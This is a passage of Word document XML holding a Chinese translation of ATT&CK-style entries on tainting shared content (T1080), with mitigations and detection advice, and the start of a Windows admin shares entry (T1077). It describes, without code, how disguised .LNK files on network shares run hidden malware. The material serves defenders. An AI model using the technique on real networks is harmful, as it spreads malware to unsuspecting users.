      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="6F9C54F9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CE08057" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> T1080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA87FD8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3D4D11" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC28FF2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>访问共享文件夹和内容的写入权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F18F9AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2F359E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A28CB3C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId226" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B553C5">
                <w:t>CAPEC-562</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00B553C5">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0998A8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>: David Routin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D325965" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B74DA21" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FF1564" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="2CE0FFA1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储在网络驱动器或其他共享位置的内容可能会被恶意程序，脚本或利用代码添加到其他有效文件中而受到污染。一旦用户打开共享的受污染内容，就会执行恶意部分以在远程系统上运行攻击者的代码。攻击者可以使用受污染的共享内容来横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB7C95" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00900513" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录共享数据透视是此技术的一种变体，它使用其他几种技术在用户访问共享网络目录时传播恶意软件。它使用目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.LNK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的快捷方式修改，假装看起来像真实的目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏文件和隐藏目录。基于恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.LNK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录具有嵌入式命令，该命令在目录中执行隐藏的恶意软件文件，然后打开实际的目标目录，以便仍然发生用户的预期操作。当与经常使用的网络目录一起使用时，该技术可能导致频繁的重新感染和对系统或可能新的和更高特权的帐户的广泛访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A749B5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="38"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="47BCE81A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="71C3559B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6DB805A1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="22B18BFF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3520F59A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C7AEBB6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>识别可能用于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>污染</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容或可能由此产生的潜在恶意软件，并在适当情况下使用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）审核和</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或阻止未知程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="0CA1A1AC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1054782D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞利用保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13931537" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用检测或减轻利用常用功能的实用程序，例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>增强型缓解体验工具包（</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="1FB3190D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="604"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FC3E9ED" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09F1E38C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>具有写访问权限的用户</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数量</w:t>
            </w:r>
            <w:r w:rsidRPr="00F817C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来保护共享文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34D4BB20" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B8554" w14:textId="5EF5AB1C" w:rsidR="00A0413E" w:rsidRPr="00F817C3" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将许多文件写入或覆盖到网络共享目录的进程可能是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视从可移动介质执行的恶意或异常活动的进程，例如由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外联</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而导致的网络连接以及可能的网络发现技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6C507" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经常扫描共享网络目录中的恶意文件，隐藏文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.LNK</w:t>
      </w:r>
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件以及在用于共享特定类型的内容的目录中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不常见</w:t>
      </w:r>
      <w:r w:rsidRPr="00F817C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的其他文件类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C516B65" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C75AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="007C75AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员共享</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w14:paraId="141E0377" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A91D0F8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1077</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="670A7450" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>技术：横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171D0013" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9898AA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>已</w:t>
            </w:r>
            <w:r>
              <w:t>启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件和打印机共享</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:t>功能</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；不会阻止源和目标</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络防火墙；远程系统上管理员</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>群</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的域账号，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或默认系统管理员</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F25A1B3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B9381A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志，进程监控，进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AA22BF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId227" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00FE38DE">
                <w:t>CAPEC-561</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3F03E968" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E77A70C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0032352F" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5067C1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
